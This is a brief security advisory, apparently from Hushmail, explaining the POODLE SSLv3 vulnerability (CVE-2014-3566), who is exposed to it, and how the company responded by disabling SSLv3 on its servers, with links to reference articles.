POODLE: SSLv3 vulnerability (CVE-2014-3566)

POODLE: SSLv3 vulnerability (CVE-2014-3566). What is it?

POODLE, or Padding Oracle on Downgraded Legacy Encryption, is a vulnerability that affects version 3 of the Secure Sockets Layer protocol (SSLv3), which is used to encrypt traffic between a website and a server. POODLE allows an attacker to steal cookies (a small data file that identifies you to an online service like your email, banking and social networking) and take over your account without needing a password.

Who is vulnerable?

Only traffic sessions using SSLv3 can be affected. Although this is an old protocol (mostly replaced with TLS) many browsers and web servers still support SSLv3 as an alternative when a TLS connection fails (Internet Explorer 6 for Windows XP, for example, only uses SSLv3). An attacker could also exploit this compatibility to downgrade a connection to SSLv3 and then conduct the POODLE attack.

To exploit the vulnerability, the attacker has to control the network the user is connected to (this can be possible in a public WiFi network or if attacker creates rogue WiFi hotspots), placing themselves between the victims and the websites.

How did Hushmail protect against it?

We disabled SSLv3 on all our servers to prevent an SSLv3 connection in case of a TLS failure.

Resources:

https://www.openssl.org/~bodo/ssl-poodle.pdf

http://www.networkworld.com/article/2833937/security/security-experts-warn-of-poodle-attack-against-ssl-30.html

http://www.wired.com/2014/10/poodle-explained/